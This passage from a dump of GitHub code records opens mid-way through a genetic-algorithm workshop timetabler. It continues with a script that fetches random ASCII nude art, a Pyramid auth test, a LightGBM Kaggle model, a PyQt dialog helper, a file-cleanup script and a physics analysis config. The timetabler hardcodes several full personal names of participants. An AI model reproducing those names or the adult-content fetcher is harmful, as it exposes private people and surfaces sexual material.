n_phases=10,\n crossover_chance=0.7, mutation_chance=0.7):\n\n global participants\n global activities\n global grouped\n global activity_max\n\n print(\"Initializiing ga_oratorio with population size: %d.\" % (pop_size))\n\n self.pop_size = pop_size\n self.n_phases = n_phases\n self.crossover_chance = crossover_chance\n self.mutation_chance = mutation_chance\n\n self.day_plan = [] # build at the end\n\n self.best_chromosome = None\n\n participants, activities = data_reader.read_data17(data)\n\n activity_max = math.floor ( len(participants) / len(activities) * n_days )\n\n self.group_participants([\"Neža Klemenčič\", \"Eva Klemenčič\", \"Zala Bertoncelj\"]) #fine tuning (some participants want to be together)\n self.group_participants([\"Jan Potočnik\", \"Urban Porenta\"])\n self.group_participants([\"Neja Potočnik\", \"Iza Šink\", \"Nika Krmelj\"])\n self.group_participants([\"Anja Hadalin \", \"Karmen Logonder\"])\n \"\"\"\n for key in grouped:\n for par in participants:\n if par[\"id\"] == key:\n print (par)\n print (\"{}{}\".format(key, grouped[key]))\n \"\"\"\n\n #print (self.activities)\n #print (self.participants)\n\n self.population = []\n self.init_population()\n\n # group_participants and return_groups take care of participants that wish to be together (they handle them as one)\n def group_participants(self, names):\n global participants\n global grouped\n\n #!! this means the participants will go to same\n #!! 
activities as the first one in names\n pp = []\n for name in names:\n for i,par in enumerate(participants):\n if par[\"name\"] == name:\n pp += [par]\n participants.remove(par)\n #check for same activities\n grades = [ x[\"grade\"] for x in pp ]\n grp = {\n \"id\": pp[0][\"id\"],\n \"name\": \"grp_{}\".format(pp[0][\"id\"]),\n \"grade\": sum(grades)/len(grades),\n \"count\": len(pp),\n \"pref\": pp[0][\"pref\"],\n \"activities\": pp[0][\"activities\"]\n }\n grouped[pp[0][\"id\"]] = pp\n participants += [grp]\n\n def return_groups(self, chromo):\n global grouped\n for key in grouped:\n for par in chromo.chromosome:\n if par[\"id\"] == key:\n #replace group with participants, keep activities\n for p in grouped[key]:\n p[\"activities\"] = par[\"activities\"]\n chromo.chromosome.remove(par)\n chromo.chromosome += grouped[key]\n break\n return chromo\n\n for participant in chromo.chromosome:\n if participant[\"id\"] in grouped:\n saved_id = participant[\"id\"]\n #put activities into participans, saved in goruped\n for saved_p in grouped[saved_id]:\n saved_p[\"activities\"] = participant[\"activities\"]\n chromo.chromosome.remove(participant)\n chromo.chromosome += grouped[saved_id]\n del grouped[saved_id]\n #print ( [\"--{}\".format(p[\"name\"]) for p in chromo.chromosome ] )\n return chromo\n\n def init_population(self):\n print(\"Initializing population:\")\n for i in range(self.pop_size):\n chrm = Chromosome(participants=participants)\n self.population += [chrm]\n\n def calc_pop_fitnesses(self):\n all_fit = []\n all_sum = 0\n for chromosome in self.population:\n f = chromosome.fitness\n all_fit += [f]\n all_sum += f\n if self.best_chromosome is None:\n self.best_chromosome = chromosome\n elif f < self.best_chromosome.fitness:\n self.best_chromosome = copy.deepcopy(chromosome)\n avg = all_sum/len(all_fit)\n \"\"\"\n for f in sorted(all_fit):\n print (f)\n print (\"------\")\n \"\"\"\n return (all_fit, avg)\n\n def evolve(self):\n phase = 0\n print(\"Begin evolving.\")\n pop_fit,avg_fit = self.calc_pop_fitnesses()\n while phase < self.n_phases:\n\n #testing:\n #pop_fit = [ 26,73,3,78,43,13 ] \n\n #sorted indices from best fitness (lowest variance) to worst fitness\n sorted_fit = [ y[0] for y in sorted(enumerate(pop_fit), key=lambda x:x[1]) ]\n #print (pop_fit)\n #print (sorted_fit)\n\n # pick chromosomes for crossover\n cross_sel = self.roulette_select(pop_fit, self.crossover_chance)\n #print (cross_sel)\n\n #perform crossover\n new_population = []\n n_added = 0\n for i in cross_sel:\n # randomly pick another one from cross_sel and cross\n j = cross_sel[randy_marsh() % len(cross_sel)]\n if i == j:\n continue #don't crossover same chromosome\n \n new_2_chromosomes = self.population[i].crossover( self.population[j] )\n if new_2_chromosomes[0].fitness < self.population[i].fitness and new_2_chromosomes[0].fitness < self.population[j].fitness:\n new_population += [new_2_chromosomes[0]]\n n_added += 1\n if new_2_chromosomes[1].fitness < self.population[i].fitness and new_2_chromosomes[1].fitness < self.population[j].fitness:\n new_population += [new_2_chromosomes[1]]\n n_added += 1\n\n #print (\"len_pop: %d, n_added: %d\" % ( len(self.population), n_added) )\n #remove some bad chromosomes\n if n_added > 0:\n new_population += [ self.population[x] for x in sorted_fit[:-n_added] ]\n self.population = new_population\n\n #mutate random chromosomes (leave best intact)\n pl = len(self.population)\n for i in range(math.ceil(pl*self.mutation_chance)):\n #pick random and mutate\n ridx = randy_marsh()%pl\n if 
self.population[ridx].id is not self.best_chromosome.id:\n self.population[ridx].mutate\n\n pop_fit,avg_fit = self.calc_pop_fitnesses()\n print(\"End of phase: %4d\\t|\\tbest_chromosome: %d (%3.3f)\\t|\\tavg fitness: %3.3f\" % \n (phase, self.best_chromosome.id, self.best_chromosome.fitness, avg_fit))\n phase += 1\n print(\"Evolution concluded.\")\n\n def build_day_plan(self):\n self.day_plan = []\n for i in range(n_days):\n self.day_plan += [[]]\n for j,a in enumerate(activities):\n self.day_plan[i] += [[]]\n\n bc = self.best_chromosome\n bc = self.return_groups( bc )\n for person in bc.chromosome:\n for i,act in enumerate(person[\"activities\"]):\n self.day_plan[i][act] += [ \"{}-{}\".format(person[\"grade\"],\n person[\"name\"]) ]\n\n def export_data(self, outfilepath):\n with open(outfilepath, 'w') as csvfile:\n spamwriter = csv.writer(\n csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n header = []\n for d in range (n_days):\n header += [ \"Dan {}: {}\".format(d, x[\"name\"]) for x in activities ]\n spamwriter.writerow(header)\n\n stop = False\n row = 0\n while not stop:\n out_row = []\n stop = True\n for day in self.day_plan:\n for act in day:\n if row < len(act):\n stop = False\n out_row += [act[row]]\n else:\n out_row += [\"/\"]\n spamwriter.writerow(out_row)\n row += 1\n print(\"Finished writing to file: %s\" % outfilepath)\n\n def roulette_select(self, ftns, pcnt):\n # input: chromosome fitnesses, output: indices of surviving chromosomes\n # fitness closer to 0: better\n # fitness is POSITIVE, you want to minimize it\n s = max(ftns)\n # subtract every value from s to invert importance\n ftns[:] = [pow(1 - x / s, 2) for x in ftns] #pow to increase difference\n # print(ftns)\n\n # create roulette_wheel\n ss = 0\n wheel = []\n for n in ftns:\n ss = ss + n\n wheel += [ss]\n # print(wheel)\n\n sel_ids = []\n # pcnt == percentage of survivers\n surv = math.ceil(len(ftns) * pcnt)\n #print (\"from %d, pick %f survivers: %d\" % (len(ftns), pcnt, surv))\n # return i survivers\n for i in range(0, surv):\n # random\n r = (randy_marsh() % 100) / 100 * wheel[-1]\n # pick a chromosome\n idx = 0\n for j in range(0, len(wheel)):\n idx = j\n if r < wheel[j]:\n break\n sel_ids += [idx]\n # print(sel_ids)\n return sel_ids\n\n\nclass Chromosome:\n def __init__(self, participants=None, chromosome=None):\n global chr_id\n self.id = chr_id\n chr_id += 1\n if chromosome is not None:\n self.chromosome = copy.deepcopy(chromosome)\n elif participants is not None:\n self.chromosome = self.init_chromosome(participants)\n else:\n raise Exception(\"Need more data to initalize a chromosome.\")\n\n self.fitness = 9999999\n self.update_fitness()\n\n def short_print(self):\n print (\"[%4d] (%3.3f)\" % (self.id, self.fitness) )\n if not self.chromosome:\n l = \"Empty\"\n else:\n l = [ p[\"id\"] for p in self.chromosome ]\n print (l)\n\n def init_chromosome(self, participants):\n global activities\n # reset counter\n for a in activities:\n a[\"count\"] = 0\n\n # creates a random chromosome\n chromosome = []\n for i, participant in enumerate(participants):\n p1 = copy.deepcopy(participant)\n\n # in p1[\"pref\"], we have activity ids [1,2,...] 
sorted by preference\n # since our representation starts with [0,1,...], we need to -1 every id\n acts = []\n day = 0\n for act in p1[\"pref\"]:\n act_id = act-1\n if day == n_days:\n break\n if activities[act_id][\"count\"] >= activity_max:\n continue\n activities[act_id][\"count\"] += 1\n acts += [act_id]\n day += 1\n p1[\"activities\"] = copy.deepcopy(acts)\n\n random.shuffle(p1[\"activities\"])\n chromosome += [p1]\n\n #print (chromosome)\n return chromosome\n\n def update_fitness (self, gsv_weight=1, aigv_weight=1):\n gsv_weight = g_w1\n aigv_weight = g_w2\n\n # build groups\n groups = []\n for day in range(n_days):\n groups += [[]]\n for activity in range(len(activities)):\n groups[day] += [[]]\n for person in self.chromosome:\n for day, act in enumerate(person[\"activities\"]):\n groups[day][act] += [person]\n\n # group size variance\n grp_sizes = []\n for day in groups:\n for act in day:\n grp_sizes += [sum([person[\"count\"] for person in act])]\n gsv = statistics.variance(grp_sizes)\n\n # average intragroup grade(age) variance\n aigv = 0\n count = 0\n for day in groups:\n for act in day:\n if len(act) < 2:\n continue\n aigv += statistics.variance([ person[\"grade\"] for person in act ])\n count += 1\n aigv = aigv / count\n\n # print(gsv)\n # print(aigv)\n f = gsv * gsv_weight + aigv * aigv_weight\n self.fitness = f\n return f\n\n def mutate(self):\n #print (\"Mutating %d.\" % self.id)\n # select random child, swap two items in his activities\n r = randy_marsh() % len(self.chromosome)\n random.shuffle(self.chromosome[r][\"activities\"])\n self.update_fitness()\n\n def crossover(self, chromosome2, prnt=False):\n r = randy_marsh() % len(self.chromosome)\n ret1 = self.chromosome[:r] + chromosome2.chromosome[r:]\n chr1 = Chromosome (chromosome=ret1)\n ret2 = chromosome2.chromosome[:r] + self.chromosome[r:]\n chr2 = Chromosome (chromosome=ret2)\n if prnt and self.id == chromosome2.id:\n print (\"Crossover::Self.fitness: %f, c2.fitness: %f, r1.fitness: %f, r2.fitness: %f.\" % (self.fitness, chromosome2.fitness, chr1.fitness, chr2.fitness))\n return (chr1, chr2)\n\nif __name__ == \"__main__\":\n # Inside class __init__ set groups of participants that want to be together\n # Set global variable n_days\n\n g_w1 = 1\n g_w2 = 0 \n for rep in range(1): \n n_days = 4\n activities = None\n participants = None\n grouped = {}\n chr_id = 0\n DEBUG1 = True\n\n ga = Ga_oratorio(data=\"../data/delavnice_2017.csv\", pop_size=50, n_phases=300, crossover_chance=0.7, mutation_chance=0.3)\n\n ga.evolve()\n ga.build_day_plan()\n\n for x in ga.best_chromosome.chromosome:\n print (\"{:20s}: {}\".format(x[\"name\"], x[\"activities\"]))\n\n for d,day in enumerate(ga.day_plan):\n for a,act in enumerate(day):\n print (\"Day {} - {}:\\n{}\".format(d,activities[a][\"name\"],act))\n\n ga.export_data(\"../data/out_{}.csv\".format(rep))\n\n g_w1 -= 0.1\n g_w2 += 0.1\n \n\n\n\n\n\n\n\n\n\n","repo_name":"voje/ga_timetable","sub_path":"python/timetablenator/GeneticAlg.py","file_name":"GeneticAlg.py","file_ext":"py","file_size_in_byte":14562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7743875470","text":"#!/usr/bin/env python3\nimport random\nimport requests\n\nCOLLECTION_URL = \"https://www.roysac.com/asciinudes/NudeArray.txt\"\nNUDE_URL_FMT = \"https://www.roysac.com/asciinudes/{}\"\n\nif __name__ == \"__main__\":\n r = requests.get(COLLECTION_URL)\n lines = [l.strip() for l in r.text.split('\\n')]\n line = random.choice(lines[1:])\n name = 
line.split('|')[5]\n    r = requests.get(NUDE_URL_FMT.format(name))\n    print(r.text.strip())\n","repo_name":"tim-napoli/showmepron","sub_path":"showmepron.py","file_name":"showmepron.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27205724273","text":"# -*- coding: utf-8 -*-\n\"\"\" Tests for the authentication utilities.\"\"\"\nfrom pyramid import testing\n\nfrom anuket.tests import AnuketTestCase\nfrom anuket.tests import AnuketDummyRequest\n\n\nclass DummyAuthenticationPolicy:\n    \"\"\" Dummy authentication policy class for testing Anuket\n    authentication.\n    \"\"\"\n    def __init__(self, result):\n        self.result = result\n\n    def unauthenticated_userid(self, request):\n        \"\"\" Fake the `pyramid.security.unauthenticated_userid` method.\"\"\"\n        return self.result\n\n\nclass SecurityTests(AnuketTestCase):\n    \"\"\" Test the authentication utilities.\"\"\"\n    def test_groupfinder(self):\n        \"\"\" Test the `groupfinder` callback.\"\"\"\n        user = self.dummy_user_fixture()\n        from anuket.security import groupfinder\n        request = testing.DummyRequest()\n        # test with a valid user_id\n        groupname = groupfinder(1, request)\n        self.assertEqual(groupname, [('group:%s' % user.group.groupname)])\n        # test with a wrong username\n        groupname = groupfinder(u'wrongname', request)\n        self.assertEqual(groupname, None)\n        # test with an empty username\n        groupname = groupfinder(None, request)\n        self.assertEqual(groupname, None)\n\n    def test_get_auth_user(self):\n        \"\"\" Test the `get_auth_user` function.\"\"\"\n        user = self.dummy_user_fixture()\n        from anuket.security import get_auth_user\n        request = AnuketDummyRequest()\n\n        from pyramid.interfaces import IAuthenticationPolicy\n        policy = DummyAuthenticationPolicy(user.user_id)\n        request.registry.registerUtility(policy, IAuthenticationPolicy)\n\n        auth_user = get_auth_user(request)\n        self.assertEqual(auth_user, user)\n","repo_name":"lazaret/anuket","sub_path":"anuket/tests/test_security.py","file_name":"test_security.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"71640234292","text":"import lightgbm as lgb\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import KFold\nfrom feature_engineering import get_features\n\n\ndef cv_LGBM(X, y):\n    # cross-validation\n    params = {'num_leaves': 50,\n              'min_child_samples': 79,\n              'min_data_in_leaf': 100,\n              'objective': 'regression',\n              'max_depth': 9,\n              'learning_rate': 0.2,\n              \"boosting_type\": \"gbdt\",\n              \"subsample_freq\": 1,\n              \"subsample\": 0.9,\n              \"metric\": 'mae',\n              \"verbosity\": -1,\n              'reg_alpha': 0.1,\n              'reg_lambda': 0.3,\n              'colsample_bytree': 1.0,\n              }\n\n    reg_model = lgb.LGBMRegressor(**params)\n    scores = []\n    cv = KFold(n_splits=10, random_state=42)\n\n    for train_index, test_index in cv.split(X):\n        print(\"Train Index: \", train_index)\n        print(\"Test Index: \", test_index, \"\\n\")\n\n        X_train, X_test, y_train, y_test = X.iloc[train_index], X.iloc[test_index], y[train_index], y[test_index]\n        reg_model.fit(X_train, y_train)\n        scores.append(reg_model.score(X_test, y_test))\n\n    print('Avg. 
score: \\n {}'.format(np.mean(scores)))\n\n ####################################################################################################################\n # Validation\n\n y_predict = reg_model.predict(X_test)\n print('Train score: {}'.format(reg_model.score(X_train, y_train)))\n print('Test score: {}'.format(reg_model.score(X_test, y_test)))\n\n fig, axes = plt.subplots()\n fig.set_size_inches(16, 12)\n lgb.plot_importance(reg_model, ax=axes)\n plt.show()\n\n # print MAE\n error = mean_absolute_error(y_test, y_predict)\n print('The mean absolute deviation is {}'.format(np.log(error)))\n\n return reg_model\n\ndef prediction(reg_model, test):\n\n y_predict_lgb = reg_model.predict(test)\n submit = pd.read_csv(os.path.join(filepath, 'sample_submission.csv')).drop(columns='scalar_coupling_constant')\n submit['scalar_coupling_constant'] = y_predict_lgb\n submit.to_csv(os.path.join(dir_out, 'submission.csv'), index=False)\n\n\nif __name__ == \"__main__\":\n\n if 'ygong' in os.getcwd():\n filepath = \"../data\"\n dir_out = \"../output\"\n else:\n filepath = \"/home/gong/Documents/Kaggle_July2019/data\"\n dir_out = \"/home/gong/Documents/Kaggle_July2019/output\"\n\n train, test = get_features(filepath)\n\n # drop irrelevant columns\n drop_list = ['id', 'molecule_name', 'atom_0', 'atom_1', 'type']\n X = train.drop(columns=['scalar_coupling_constant'] + drop_list)\n y = train['scalar_coupling_constant']\n test = test.drop(columns=drop_list)\n\n # cross-validation\n model = cv_LGBM(X, y)\n # prediction on test dataset\n prediction(model, test)\n\n","repo_name":"geraldgong/Kaggle_July2019","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25915621880","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\nimport functools\n\n# Decorator to wrap a dialog\ndef InitDialogWithOkCancel(fun = None, Layout = QtWidgets.QFormLayout , apply_ = True):\n def wrap_init(init_fun):\n @functools.wraps(init_fun)\n def wrapped_init(self, parent, *args, **kwargs):\n super(QtWidgets.QDialog, self).__init__(parent)\n self.setModal(True)\n self.layout = Layout(self)\n init_fun(self, parent, *args, **kwargs)\n confirmLayout = QtWidgets.QHBoxLayout()\n okButton = QtWidgets.QPushButton(\"Ok\", self)\n confirmLayout.addWidget(okButton)\n okButton.clicked.connect(self.accept)\n if apply_:\n applyButton = QtWidgets.QPushButton(\"Apply\", self)\n confirmLayout.addWidget(applyButton)\n applyButton.clicked.connect(self.apply)\n cancelButton = QtWidgets.QPushButton(\"Cancel\", self)\n confirmLayout.addWidget(cancelButton)\n cancelButton.clicked.connect(self.reject)\n if Layout is QtWidgets.QFormLayout:\n self.layout.addRow(confirmLayout)\n elif Layout is QtWidgets.QGridLayout:\n colSpan = 2\n if apply_:\n colSpan += 1\n self.layout.addLayout(confirmLayout, self.layout.rowCount(), 1, 1, colSpan)\n else:\n self.layout.addLayout(confirmLayout)\n return wrapped_init\n if fun:\n return wrap_init(fun)\n else:\n return wrap_init\n","repo_name":"stephane-caron/lipm_walking_controller","sub_path":"logs/mc_log_ui/mc_log_utils.py","file_name":"mc_log_utils.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":187,"dataset":"github-code","pt":"21"} +{"seq_id":"36145282832","text":"#!/bin/env python\n\nimport argparse\nimport os\nfrom os import path\n\nparser = 
argparse.ArgumentParser()\nparser.add_argument(dest=\"tumour_base_name\")\nparser.add_argument(dest=\"normal_base_name\")\n\nargs = parser.parse_args()\ntumour_base = args.tumour_base_name\nnorm_base = args.normal_base_name\n\ntumour_bam = \"%s.sorted.bam\" % tumour_base\ntumour_index = tumour_bam + \".bai\"\n\nif os.path.exists(tumour_bam) and os.path.exists(tumour_index):\n base_dir = os.path.dirname(tumour_bam)\n unsorted_bam = \"%s.bam\" % tumour_base\n if os.path.exists(unsorted_bam):\n os.remove(unsorted_bam)\n print(\"Removed %s\" % unsorted_bam) \n files = os.listdir(base_dir)\n for file in files:\n if file.endswith(\".sam\") or file.endswith(\".fq\"):\n remove_file = os.path.join(base_dir,file)\n os.remove(remove_file)\n print(\"Removed %s\" % remove_file)\n\n","repo_name":"mcmero/sv_simu_pipe","sub_path":"scripts/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31631621536","text":"import ROOT \nimport math\nfrom array import array\nimport numpy as np\n\n#############################\n##### General settings ######\n#############################\n\n#########################\n# folder for picotuples #\n#########################\npicoFolder='/eos/user/r/rasp/output/HighPT'\n\n#######################\n# folders for figures #\n#######################\nfiguresFolderFF = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/FF'\nfiguresFolderMetTrigger = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/MetTrigger'\nfiguresFolderSys = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/Sys'\nfiguresFolderWMuNu = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/WMuNu'\nfiguresFolderWTauNu = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/WTauNu_eta'\n\n########################\n# folder for datacards #\n########################\ndatacardsFolder = '/afs/cern.ch/work/r/rasp/public/HighPT_v2/datacards_eta'\n\n###################\n# Cross sections #\n###################\n\nsampleXSec_2016 = { \n\"DYJetsToLL_M-50\" : 6077.22,\n\"TTTo2L2Nu\" : 88.29,\n\"TTToSemiLeptonic\" : 365.35,\n\"TTToHadronic\" : 377.96, \n\"WJetsToLNu_HT-100To200\" : 1395.0*1.166,\n\"WJetsToLNu_HT-200To400\" : 407.9*1.166,\n\"WJetsToLNu_HT-400To600\" : 57.48*1.166,\n\"WJetsToLNu_HT-600To800\" : 12.87*1.166,\n\"WJetsToLNu_HT-800To1200\" : 5.366*1.166,\n\"WJetsToLNu_HT-1200To2500\" : 1.074*1.166,\n\"WJetsToLNu\" : 61526.7 , \n\"ST_tW_antitop_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_tW_top_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_t-channel_antitop_4f_InclusiveDecays\" : 80.95,\n\"ST_t-channel_top_4f_InclusiveDecays\" : 136.02,\n\"WW\" : 118.7,\n\"WZ\" : 27.68,\n\"ZZ\" : 12.19,\n\"ZJetsToNuNu_HT-100To200\" : 304.5,\n\"ZJetsToNuNu_HT-200To400\" : 91.82,\n\"ZJetsToNuNu_HT-400To600\" : 13.11,\n\"ZJetsToNuNu_HT-600To800\" : 3.260,\n\"ZJetsToNuNu_HT-800To1200\" : 1.499,\n\"ZJetsToNuNu_HT-1200To2500\" : 0.3430,\n\"WToMuNu_M-200\" : 6.238,\n\"WToTauNu_M-200\" : 6.206\n}\n\nsampleXSec_2017 = {\n\"DYJetsToLL_M-50\" : 6077.22,\n\"TTTo2L2Nu\" : 88.29,\n\"TTToSemiLeptonic\" : 365.35,\n\"TTToHadronic\" : 377.96, \n\"WJetsToLNu_HT-100To200\" : 1395.0*1.166,\n\"WJetsToLNu_HT-200To400\" : 407.9*1.166,\n\"WJetsToLNu_HT-400To600\" : 57.48*1.166,\n\"WJetsToLNu_HT-600To800\" : 12.87*1.166,\n\"WJetsToLNu_HT-800To1200\" : 5.366*1.166,\n\"WJetsToLNu_HT-1200To2500\" : 1.074*1.166,\n\"WJetsToLNu\" : 61526.7 , \n\"ST_tW_antitop_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_tW_top_5f_NoFullyHadronicDecays\" : 
19.47,\n\"ST_t-channel_antitop_4f_InclusiveDecays\" : 80.95,\n\"ST_t-channel_top_4f_InclusiveDecays\" : 136.02,\n\"WW\" : 118.7,\n\"WZ\" : 27.68,\n\"ZZ\" : 12.19,\n\"ZJetsToNuNu_HT-100To200\" : 304.5,\n\"ZJetsToNuNu_HT-200To400\" : 91.82,\n\"ZJetsToNuNu_HT-400To600\" : 13.11,\n\"ZJetsToNuNu_HT-600To800\" : 3.260,\n\"ZJetsToNuNu_HT-800To1200\" : 1.499,\n\"ZJetsToNuNu_HT-1200To2500\" : 0.3430,\n\"WToMuNu_M-200\" : 6.990,\n\"WToTauNu_M-200\" : 7.246\n}\n\nsampleXSec_2018 = {\n\"DYJetsToLL_M-50\" : 6077.22,\n\"TTTo2L2Nu\" : 88.29,\n\"TTToSemiLeptonic\" : 365.35,\n\"TTToHadronic\" : 377.96, \n\"WJetsToLNu_HT-100To200\" : 1395.0*1.166,\n\"WJetsToLNu_HT-200To400\" : 407.9*1.166,\n\"WJetsToLNu_HT-400To600\" : 57.48*1.166,\n\"WJetsToLNu_HT-600To800\" : 12.87*1.166,\n\"WJetsToLNu_HT-800To1200\" : 5.366*1.166,\n\"WJetsToLNu_HT-1200To2500\" : 1.074*1.166,\n\"WJetsToLNu\" : 61526.7 , \n\"ST_tW_antitop_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_tW_top_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_t-channel_antitop_4f_InclusiveDecays\" : 80.95,\n\"ST_t-channel_top_4f_InclusiveDecays\" : 136.02,\n\"WW\" : 118.7,\n\"WZ\" : 27.68,\n\"ZZ\" : 12.19,\n\"ZJetsToNuNu_HT-100To200\" : 304.5,\n\"ZJetsToNuNu_HT-200To400\" : 91.82,\n\"ZJetsToNuNu_HT-400To600\" : 13.11,\n\"ZJetsToNuNu_HT-600To800\" : 3.260,\n\"ZJetsToNuNu_HT-800To1200\" : 1.499,\n\"ZJetsToNuNu_HT-1200To2500\" : 0.3430,\n\"WToMuNu_M-200\" : 6.990,\n\"WToTauNu_M-200\" : 7.246\n}\n\neraSamples = {\n\"UL2016_postVFP\" : sampleXSec_2016,\n\"UL2016_preVFP\" : sampleXSec_2016,\n\"UL2017\" : sampleXSec_2017, \n\"UL2018\" : sampleXSec_2018\n}\n\neraLumi = {\n \"UL2016\" : 36300,\n \"UL2016_postVFP\" : 16800,\n \"UL2016_preVFP\" : 19500,\n \"UL2017\" : 41480, \n \"UL2018\" : 59830\n}\n\n\n################\n# Data samples #\n################\n\nsinglemu_2018 = ['SingleMuon_Run2018A','SingleMuon_Run2018B','SingleMuon_Run2018C','SingleMuon_Run2018D']\nsinglemu_2017 = ['SingleMuon_Run2017B','SingleMuon_Run2017C','SingleMuon_Run2017D','SingleMuon_Run2017E','SingleMuon_Run2017F']\n\njetht_2018 = ['JetHT_Run2018A','JetHT_Run2018B','JetHT_Run2018C','JetHT_Run2018D']\njetht_2017 = ['JetHT_Run2017B','JetHT_Run2017C','JetHT_Run2017D','JetHT_Run2017E','JetHT_Run2017F']\n\nmet_2018 = ['MET_Run2018A','MET_Run2018B','MET_Run2018C','MET_Run2018D']\nmet_2017 = ['MET_Run2017B','MET_Run2017C','MET_Run2017D','MET_Run2017E','MET_Run2017F']\n\nsinglemu = {\n \"UL2017\": singlemu_2017,\n \"UL2018\": singlemu_2018\n}\n\njetht = {\n \"UL2017\": jetht_2017,\n \"UL2018\": jetht_2018\n}\n\nmet = {\n \"UL2017\": met_2017,\n \"UL2018\": met_2018\n}\n\ntauWPs = {\n 'Loose': \"4\",\n 'Medium': \"5\",\n 'Tight': \"6\",\n 'VTight': \"7\",\n 'VVTight': \"8\"\n}\n\ntauIntWPs = {\n 'Loose': 4,\n 'Medium': 5,\n 'Tight': 6,\n 'VTight': 7,\n 'VVTight': 8 \n}\n\n#############################\n# Shape uncertainties (JME) #\n#############################\nunc_jme = ['JES','Unclustered']\n\n###############################\n# Shape uncertainties (taues) #\n###############################\nunc_taues = ['taues','taues_1pr','taues_1pr1pi0','taues_3pr','taues_3pr1pi0'] \n\n##################################\n### Settings for FF measurements #\n##################################\n\nxbinsPt2D = [100, 125, 150, 200, 2000] \nxbinsPt = [100, 125, 150, 175, 200, 2000]\nptUncThreshold = 200. # split pt region for stat. 
uncertainties (<200, >=200.)\n\nptratio2DCuts = {\n    'ptratioLow'  : 'jpt_ratio_2<0.85',\n    'ptratioHigh' : 'jpt_ratio_2>=0.85'\n}\nptratio2DThreshold = 0.85\n\n#ptratioCuts = {\n#    'ptratioLow'   : 'jpt_ratio_2<0.8',\n#    'ptratioMedium': 'jpt_ratio_2>=0.8&&jpt_ratio_2<0.9',\n#    'ptratioHigh'  : 'jpt_ratio_2>=0.9'\n#}\n#ptratioThresholds = [0.8, 0.9]\n\nptratioCuts = {\n    'ptratioLow'  : 'jpt_ratio_2<0.85',\n#    'ptratioMedium': 'jpt_ratio_2>=0.8&&jpt_ratio_2<0.9',\n    'ptratioHigh' : 'jpt_ratio_2>=0.85'\n}\nptratioThreshold = 0.85\n\ndecaymode2DCuts = {\n    '1prong'    : 'dm_2==0',\n    '1prongPi0' : '(dm_2==1||dm_2==2)',\n    '3prong'    : 'dm_2==10',\n    '3prongPi0' : 'dm_2==11'\n}\n\ndecaymodeCuts = {\n    '1prongPi0' : '(dm_2==1||dm_2==2)',\n    '3prong'    : 'dm_2==10',\n    '3prongPi0' : 'dm_2==11'}\n\nxbinsMass = {\n    '1prongPi0': [0.4, 0.6, 0.8, 1.0, 1.2, 1.4, 1.6, 1.8],\n    '3prong'   : [0.9, 1.0, 1.1, 1.2, 1.3, 1.4],\n    '3prongPi0': [1.0, 1.1, 1.2, 1.3, 1.4, 1.5]\n}\n\n# histogram labels (W*->tau+v selection)\nhistLabels = ['','_SB','_mc_wjets','_data_wjets','_data_dijets']\nhistSysLabels = ['_mc_wjets','_data_wjets','_data_dijets']\nptratioLabels = ['_ptratioLow','_ptratioMedium','_ptratioHigh']\nstatUncLabels = ['_unc1','_unc2']\n\nXTitle = {\n    'mt_1'  : \"m_{T} (GeV)\",\n    'pt_1'  : \"p_{T} (GeV)\",\n    'eta_1' : \"#eta\",\n    'met'   : \"E_{T}^{mis} (GeV)\",\n    'm_1'   : \"mass (GeV)\"\n}\n\n#######################################\n# Creating shape systematic templates #\n#######################################\ndef ComputeSystematics(h_central, h_sys, name):\n    h_up = h_central.Clone(name+\"Up\")\n    h_down = h_central.Clone(name+\"Down\")\n    nbins = h_central.GetNbinsX()\n    for i in range(1,nbins+1):\n        x_up = h_sys.GetBinContent(i)\n        x_central = h_central.GetBinContent(i)\n        x_down = x_central\n        if x_up>0:\n            x_down = x_central*x_central/x_up\n        h_up.SetBinContent(i,x_up)\n        h_down.SetBinContent(i,x_down)\n\n    return h_up, h_down\n\ndef extractBinLabels(pt,ptratio):\n    ratLabel = '_ptratioLow'\n    # if ptratio>=ptratioThresholds[0] and ptratio<ptratioThresholds[1]: ratLabel = '_ptratioMedium'\n    # if ptratio>=ptratioThresholds[1]: ratLabel = '_ptratioHigh'\n    if ptratio>=ptratioThreshold: ratLabel = '_ptratioHigh'\n    uncLabel = '_unc1'\n    if pt>ptUncThreshold: uncLabel = '_unc2'\n    return ratLabel, uncLabel\n\n# Run over set of samples and create histogram\ndef RunSamples(samples,var,weight,cut,xbins,name):\n    print('')\n    print(\"Running\",name,var,weight,cut)\n    nbins = len(xbins)-1\n    hist = ROOT.TH1D(name,\"\",nbins,array('d',list(xbins)))\n    for sampleName in samples:\n        sample = samples[sampleName]\n        histsample = sample.CreateHisto(var,weight,cut,xbins,name+\"_\"+sampleName)\n        hist.Add(hist,histsample,1.,1.)\n    return hist\n\n# Run over set of samples and create histograms for W*->tau+v channel\n# for each sample a loop over the Tree entries is performed\ndef RunSamplesTauNu(samples,var,unc,xbins,selection,name):\n    print('')\n    print(\"Running\",name,var,unc,selection)\n    nbins = len(xbins)-1\n    hists = 